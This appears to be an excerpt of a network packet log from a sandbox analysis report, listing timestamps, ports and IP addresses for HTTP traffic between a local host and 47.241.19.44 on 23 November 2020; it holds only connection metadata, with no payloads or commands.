Nov 23, 2020 16:13:01.055171967 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055188894 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055205107 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055207968 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055226088 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055250883 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055274963 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.116513014 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.142836094 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.142862082 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.142879009 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.142899036 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.142926931 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.142977953 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.185233116 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.203983068 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.204112053 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.255522966 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255599976 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255642891 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255677938 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255716085 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255758047 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255795956 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255803108 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.255832911 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.255835056 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255875111 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255909920 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.255922079 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.255964041 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256001949 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256036997 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.256040096 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256047010 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.256105900 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256145000 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256181002 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256187916 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.256197929 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.256218910 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256256104 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256302118 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.256341934 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.256612062 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.297280073 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.302078009 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.317013025 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.343338013 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.343396902 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.343640089 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.385662079 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.385694027 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.385993958 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.404746056 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.449450016 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.456182003 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456249952 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456285000 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456320047 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456351995 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.456353903 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456389904 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456427097 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456450939 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.456459999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456504107 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456531048 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.456536055 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.456542015 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456573963 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.456712008 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.492543936 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.607884884 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.754162073 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.884741068 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.885121107 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.885154963 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:02.204037905 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882647991 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882669926 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882687092 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882709026 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882714987 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:02.882725000 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882747889 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882756948 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:02.882766962 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882778883 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:02.882783890 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882819891 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:02.882842064 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882877111 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:02.882966042 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.159611940 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159656048 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159673929 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159693003 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159710884 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159734011 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159755945 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159778118 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159797907 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159821033 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159842014 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159861088 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159881115 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159898043 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159921885 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159924984 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.159945011 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159967899 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.159981012 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.159982920 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.160021067 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.276696920 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.276747942 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.276892900 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.436786890 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436825037 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436851025 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436875105 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436896086 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436918974 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436940908 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436943054 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.436963081 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.436988115 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437011003 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437014103 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.437036991 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437058926 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437060118 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.437081099 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437096119 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.437100887 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.437163115 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.438388109 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.438410997 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.438472033 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.473750114 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473793030 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473815918 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473836899 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473864079 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473890066 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473916054 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473942995 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.473968029 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474001884 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474030972 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474034071 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.474056959 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474086046 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474112034 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474137068 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474153042 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.474165916 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474191904 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.474225044 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.474365950 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.553706884 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.621313095 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.713967085 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714010000 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714042902 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714071989 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714098930 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714101076 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714129925 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714148998 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714157104 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714186907 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714191914 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714226007 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714248896 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714253902 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714282990 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714309931 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714337111 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714364052 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714376926 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714392900 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714416027 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714426994 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714457989 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714468002 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.714485884 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.714529037 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.715154886 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.761912107 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.867742062 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867764950 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867779016 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867791891 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867808104 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867821932 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867841005 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867858887 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867876053 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867882967 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.867893934 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867912054 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867927074 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.867964983 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.868010998 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.898185968 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909003973 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909032106 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909044027 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909055948 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909070015 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909085035 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:03.909102917 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.909162045 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:03.991295099 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.043167114 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.064770937 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064794064 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064805031 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064934015 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064944029 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.064953089 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064970016 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.064989090 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065006971 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065022945 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065037012 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065047026 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.065052032 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065068007 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.065123081 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.105984926 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106012106 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106028080 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106044054 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106060028 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106076956 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106092930 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106106043 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.106112003 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.106157064 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.106187105 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.144613981 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.199426889 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.261878967 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261904001 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261917114 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261934996 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261954069 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261971951 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261987925 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.261987925 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.262005091 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.262022018 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.262037992 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.262042046 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.262054920 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.262070894 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.262073994 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.262101889 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.302939892 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.302961111 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.302973032 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.302984953 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.303000927 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.303009987 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.303018093 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.303035021 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.303049088 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.303088903 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.320024967 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.320086956 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.345020056 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.345038891 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.345118046 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.382766962 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.433804989 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.458880901 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.458935022 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.458951950 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.458969116 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.458980083 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.458985090 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459003925 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459017038 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.459023952 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459042072 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459044933 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.459059954 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459078074 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459094048 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459100962 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.459110975 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.459132910 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.459161043 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.479140997 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500014067 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500032902 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500050068 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500070095 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500071049 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.500087023 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500102997 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.500103951 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.500159979 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.538780928 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.538892984 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.542083979 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.542102098 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.542120934 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.542216063 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.579700947 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.579770088 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.655894041 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.655915022 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.655931950 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.655947924 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.655966997 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.655976057 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.655986071 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656002998 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656018972 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656025887 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.656035900 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656052113 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656068087 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656070948 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.656085014 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.656097889 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.656124115 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.697031975 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697052002 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697067022 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697083950 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697098970 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697109938 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697127104 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.697129011 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.697149038 CET	49752	80	192.168.2.3	47.241.19.44
